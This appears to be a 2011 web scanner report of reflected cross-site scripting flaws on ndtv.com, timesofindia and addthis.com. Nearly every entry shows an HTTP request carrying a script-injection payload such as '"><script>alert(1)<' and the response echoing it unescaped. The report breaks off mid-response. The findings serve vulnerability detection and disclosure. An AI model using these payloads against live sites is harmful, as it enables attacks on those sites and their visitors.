GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14432 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:26 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... -mumbai-airport-s-main params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shut'; params += '&identifier=' + 'story-13114227bb1</script><script params += '&ctype=' + 'story'; params += '&site=' + 'ndtv'; if(!o.cache){ params += '&rm=' + Math.random(); p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14413 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:10 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... var BASE_URL = "http://social.ndtv.com"; var CDN_URL = ""; var cookie_name = 'http://www.ndtv.com </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14461 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:09 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" name="page_url" value="http://www.ndtv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14419 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:13 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" name="page_title" value="48 hours on, Mumbai airport's main runway still shut8e0d0"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14430 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:15 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... = '&link=' + 'http://www.ndtv.com params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shute9e9d</script><script params += '&identifier=' + 'story-131142'; params += '&ctype=' + 'story'; params += '&site=' + 'ndtv'; if(!o.cache){ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /tbModel/comments.php |
GET /tbModel/comments.php?50f53"><script>alert(1)< Host: social.ndtv.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Expires: Sun, 04 Sep 2011 04:21:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 04:21:27 GMT Content-Length: 9450 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/tbModel/comments ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://timesofindia |
Path: | /topic/Xss |
GET /topic/Xss400fa"%3b62b9b70133a HTTP/1.1 Host: timesofindia.indiatimes Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs |
HTTP/1.1 200 OK Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA CacheControl: public Last-Modified: Sun, 04 Sep 2011 03:40:40 GMT Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 30700 Expires: Sun, 04 Sep 2011 05:30:40 GMT Date: Sun, 04 Sep 2011 03:41:08 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script language="JavaScript">var searchvel = "Xss400fa";62b9b70133a"; function GetParam(name) { var match = new RegExp('[\?&]'+name+"=([^ if (match==null) return null; else return decodeURIComponent(match ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api5d302<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:14:46 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api5d302<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /apie7874"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:14:45 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/apie7874"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai2a45d"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:14:52 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api/nai2a45d"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai9a7f4<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:14:53 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai9a7f4<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai/optout8f8d1<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:15:00 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai/optout8f8d1<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/optout |
GET /api/nai/optout9a7c1"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:15:00 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api/nai/optout9a7c1"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /api1eb37<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:00:16 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api1eb37<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /api7b37c"-alert(1)- Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:00:16 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/api7b37c"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addthis.com |
Path: | /api/nai/status |
GET /api/nai942a7<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 11:00:24 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: |